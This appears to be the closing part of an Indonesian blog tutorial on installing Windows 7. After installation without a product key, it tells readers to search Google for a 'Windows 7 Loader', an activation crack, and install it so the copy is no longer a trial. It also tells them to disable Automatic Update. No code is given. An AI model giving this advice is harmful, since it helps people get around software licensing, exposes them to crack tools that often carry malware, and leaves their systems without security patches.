    Windows Seven
    Windows Seven
Semua proses penginstallan Operating Sytem Windows Seven telah rampung , dan tinggal menginstall Driver dan software software lainnya , di komputer dengan O.S baru nya :D .

Eits tunggu dulu semua belum selesai , karena tadi sahabat tidak mengisi Product key , maka sahabat masih mempunyai Windows Seven Versi Trial Selama 30 Hari saja.
Untuk membuat Windows Seven Sahabat menjadi full atau tidak trial lagi silahkan sahabat cari di Mbah google yang namanya , ” WIndows 7 Loder” dan install di Komputer Windows Seven sahabat ,
Jangan Lupa Pula untuk Menonaktifkan Automatic Update di Windows Seven sahabat.
Terima kasih